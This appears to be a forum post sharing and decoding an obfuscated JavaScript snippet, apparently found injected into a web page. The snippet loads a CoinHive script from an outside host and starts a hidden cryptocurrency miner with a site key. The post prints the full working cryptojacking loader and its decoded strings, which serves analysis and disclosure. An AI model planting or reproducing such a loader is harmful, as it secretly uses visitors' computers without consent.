Here's the relevant code if anyone is interested:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];
function loadScript(_0xca68x2, _0xca68x3) {
var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
_0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
_0xca68x4[_0x7a2c[4]] = _0xca68x2;
_0xca68x4[_0x7a2c[5]] = _0xca68x3;
_0xca68x4[_0x7a2c[6]] = _0xca68x3;
document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
}
loadScript(_0x7a2c[9], function() {
var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
threads: 4
});
_0xca68x5[_0x7a2c[11]]()
});
If you decode var _0x7a2c using a service like
http://ddecode.com/hexdecoder/, you'll get this:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
